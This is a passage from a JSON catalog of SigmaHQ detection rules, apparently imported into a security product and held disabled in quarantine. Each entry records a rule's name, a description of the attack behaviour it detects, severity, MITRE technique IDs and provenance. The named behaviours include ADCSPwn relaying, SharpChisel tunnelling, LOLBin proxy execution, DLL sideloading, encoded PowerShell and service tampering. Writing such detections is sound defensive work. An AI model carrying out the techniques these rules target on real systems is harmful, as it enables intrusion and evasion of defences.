"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml" } }, { "id": "sigmahq-sigma-cd55f721-5623-4663-bd9b-5229cab5237d", "type": "detection", "name": "OpenCanary - SSH New Connection Attempt", "description": "Detects instances where an SSH service on an OpenCanary node has had a connection attempt.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1021", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-ssh-new-connection-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd55f721-5623-4663-bd9b-5229cab5237d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_ssh_new_connection.yml" } }, { "id": "sigmahq-sigma-cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", "type": "detection", "name": "New Firewall Rule Added Via Netsh.EXE", "description": "Detects the addition of a new rule to the Windows firewall via netsh", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-firewall-rule-added-via-netsh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_netsh_fw_add_rule.yml" } }, { "id": "sigmahq-sigma-cd71385d-fd9b-4691-9b98-2b1f7e508714", "type": "detection", "name": "Lolbin Runexehelper Use As Proxy", "description": "Detect usage of the \"runexehelper.exe\" binary as a proxy to launch other programs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lolbin-runexehelper-use-as-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd71385d-fd9b-4691-9b98-2b1f7e508714", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml" } }, { "id": "sigmahq-sigma-cd764533-2e07-40d6-a718-cfeec7f2da7f", "type": "detection", "name": "Renamed SysInternals DebugView Execution", "description": "Detects suspicious renamed SysInternals DebugView execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1588.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-sysinternals-debugview-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_sysinternals_debugview.yml" } }, { "id": "sigmahq-sigma-cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca", "type": "detection", "name": "Suspicious File Creation Activity From Fake Recycle.Bin Folder", "description": "Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-creation-activity-from-fake-recycle-bin-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml" } }, { "id": "sigmahq-sigma-cd8c163e-a19b-402e-bdd5-419ff5859f12", "type": "detection", "name": "HackTool - ADCSPwn Execution", "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1557.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-adcspwn-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_adcspwn.yml" } }, { "id": "sigmahq-sigma-cd951fdc-4b2f-47f5-ba99-a33bf61e3770", "type": "detection", "name": "Always Install Elevated Windows Installer", "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/always-install-elevated-windows-installer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml" } }, { "id": "sigmahq-sigma-cdb15e19-c2d0-432a-928e-e49c8c60dcf2", "type": "detection", "name": "Potential DLL Sideloading Of MsCorSvc.DLL", "description": "Detects potential DLL sideloading of \"mscorsvc.dll\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-of-mscorsvc-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cdb15e19-c2d0-432a-928e-e49c8c60dcf2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_mscorsvc.yml" } }, { "id": "sigmahq-sigma-cdc8da7d-c303-42f8-b08c-b4ab47230263", "type": "detection", "name": "Rundll32 Internet Connection", "description": "Detects a rundll32 that communicates with public IP addresses", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rundll32-internet-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cdc8da7d-c303-42f8-b08c-b4ab47230263", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml" } }, { "id": "sigmahq-sigma-cde0a575-7d3d-4a49-9817-b8004a7bf105", "type": "detection", "name": "Uncommon New Firewall Rule Added In Windows Firewall Exception List", "description": "Detects when a rule has been added to the Windows Firewall exception list", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-new-firewall-rule-added-in-windows-firewall-exception-list.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cde0a575-7d3d-4a49-9817-b8004a7bf105", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/firewall_as/win_firewall_as_add_rule.yml" } }, { "id": "sigmahq-sigma-cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", "type": "detection", "name": "Potential Encoded PowerShell Patterns In CommandLine", "description": "Detects specific combinations of encoding methods in PowerShell via the commandline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-encoded-powershell-patterns-in-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_encoding_patterns.yml" } }, { "id": "sigmahq-sigma-cdfa73b6-3c9d-4bb8-97f8-ddbd8921f5c5", "type": "detection", "name": "Potential Unconstrained Delegation Discovery Via Get-ADComputer - ScriptBlock", "description": "Detects the use of the \"Get-ADComputer\" cmdlet in order to identify systems which are configured for unconstrained delegation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018", "T1558", "T1589.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-unconstrained-delegation-discovery-via-get-adcomputer-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cdfa73b6-3c9d-4bb8-97f8-ddbd8921f5c5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_potential_unconstrained_delegation_discovery.yml" } }, { "id": "sigmahq-sigma-ce446a9e-30b9-4483-8e38-d2c9ad0a2280", "type": "detection", "name": "Steganography Hide Files with Steghide", "description": "Detects embedding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1027.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/steganography-hide-files-with-steghide.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ce446a9e-30b9-4483-8e38-d2c9ad0a2280", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_steghide_embed_steganography.yml" } }, { "id": "sigmahq-sigma-ce5678bb-b9aa-4fb5-be4b-e57f686256ad", "type": "detection", "name": "Potential Remote Desktop Connection to Non-Domain Host", "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-remote-desktop-connection-to-non-domain-host.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/ntlm/win_susp_ntlm_rdp.yml" } }, { "id": "sigmahq-sigma-ce7066a6-508a-42d3-995b-2952c65dc2ce", "type": "detection", "name": "Drop Binaries Into Spool Drivers Color Folder", "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/drop-binaries-into-spool-drivers-color-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ce7066a6-508a-42d3-995b-2952c65dc2ce", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml" } }, { "id": "sigmahq-sigma-ce72ef99-22f1-43d4-8695-419dcb5d9330", "type": "detection", "name": "Suspicious Windows Service Tampering", "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1489", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-windows-service-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_service_tamper.yml" } }, { "id": "sigmahq-sigma-ce7cf472-6fcc-490a-9481-3786840b5d9b", "type": "detection", "name": "InfDefaultInstall.exe .inf Execution", "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/infdefaultinstall-exe-inf-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ce7cf472-6fcc-490a-9481-3786840b5d9b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml" } }, { "id": "sigmahq-sigma-cea2b7ea-792b-405f-95a1-b903ea06458f", "type": "detection", "name": "Suspicious Child Process Of Manage Engine ServiceDesk", "description": "Detects suspicious child processes of the \"Manage Engine ServiceDesk Plus\" Java web service", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1102" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-child-process-of-manage-engine-servicedesk.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cea2b7ea-792b-405f-95a1-b903ea06458f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml" } }, { "id": "sigmahq-sigma-cea72823-df4d-4567-950c-0b579eaf0846", "type": "detection", "name": "Potential Dropper Script Execution Via WScript/CScript/MSHTA", "description": "Detects wscript/cscript/mshta executions of scripts located in user directories", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.005", "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dropper-script-execution-via-wscript-cscript-mshta.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cea72823-df4d-4567-950c-0b579eaf0846", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wscript_cscript_mshta_dropper.yml" } }, { "id": "sigmahq-sigma-ceb407f6-8277-439b-951f-e4210e3ed956", "type": "detection", "name": "Cisco Clear Logs", "description": "Clear command history in network OS which is used for defense evasion", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-clear-logs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ceb407f6-8277-439b-951f-e4210e3ed956", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/aaa/cisco_cli_clear_logs.yml" } }, { "id": "sigmahq-sigma-ceb55fd0-726e-4656-bf4e-b585b7f7d572", "type": "detection", "name": "Suspicious Inbox Manipulation Rules", "description": "Detects suspicious rules that delete or move messages or folders are set on a user's inbox.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1140" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-inbox-manipulation-rules.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ceb55fd0-726e-4656-bf4e-b585b7f7d572", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_inbox_manipulation.yml" } }, { "id": "sigmahq-sigma-cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", "type": "detection", "name": "OpenWith.exe Executes Specified Binary", "description": "The OpenWith.exe executes other binary", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/openwith-exe-executes-specified-binary.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_openwith.yml" } }, { "id": "sigmahq-sigma-cef24b90-dddc-4ae1-a09a-8764872f69fc", "type": "detection", "name": "Suspicious Get Local Groups Information", "description": "Detects the use of PowerShell modules and cmdlets to gather local group information.\nAdversaries may use local system permission groups to determine which groups exist and which users belong to a particular group such as the local administrators group.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-get-local-groups-information.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cef24b90-dddc-4ae1-a09a-8764872f69fc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_susp_local_group_reco.yml" } }, { "id": "sigmahq-sigma-cf0c254b-22f1-4b2b-8221-e137b3c0af94", "type": "detection", "name": "HackTool - Impersonate Execution", "description": "Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1134.001", "T1134.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-impersonate-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cf0c254b-22f1-4b2b-8221-e137b3c0af94", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_impersonate.yml" } }, { "id": "sigmahq-sigma-cf1dbc6b-6205-41b4-9b88-a83980d2255b", "type": "detection", "name": "Okta API Token Revoked", "description": "Detects when a API Token is revoked.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-api-token-revoked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cf1dbc6b-6205-41b4-9b88-a83980d2255b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_api_token_revoked.yml" } }, { "id": "sigmahq-sigma-cf2e938e-9a3e-4fe8-a347-411642b28a9f", "type": "detection", "name": "Potential PowerShell Execution Policy Tampering - ProcCreation", "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-powershell-execution-policy-tampering-proccreation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml" } }, { "id": "sigmahq-sigma-cf610c15-ed71-46e1-bdf8-2bd1a99de6c4", "type": "detection", "name": "Download File To Potentially Suspicious Directory Via Wget", "description": "Detects the use of wget to download content to a suspicious directory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/download-file-to-potentially-suspicious-directory-via-wget.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cf610c15-ed71-46e1-bdf8-2bd1a99de6c4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_wget_download_suspicious_directory.yml" } }, { "id": "sigmahq-sigma-cf93e05e-d798-4d9e-b522-b0248dc61eaf", "type": "detection", "name": "HackTool - SharpChisel Execution", "description": "Detects usage of the Sharp Chisel via the commandline arguments", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sharpchisel-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sharp_chisel.yml" } }, { "id": "sigmahq-sigma-cfec9d29-64ec-4a0f-9ffe-0fdb856d5446", "type": "detection", "name": "Suspicious Git Clone - Linux", "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1593.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-git-clone-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cfec9d29-64ec-4a0f-9ffe-0fdb856d5446", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml" } }, { "id": "sigmahq-sigma-cfeed607-6aa4-4bbd-9627-b637deb723c8", "type": "detection", "name": "New or Renamed User Account with '$' Character", "description": "Detects the creation of a user with the \"$\" character. This can be used by attackers to hide a user or trick detection systems that lack the parsing mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-or-renamed-user-account-with-character.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml" } }, { "id": "sigmahq-sigma-d00a9a72-2c09-4459-ad03-5e0a23351e36", "type": "detection", "name": "Suspicious LDAP-Attributes Used", "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1001.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-ldap-attributes-used.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 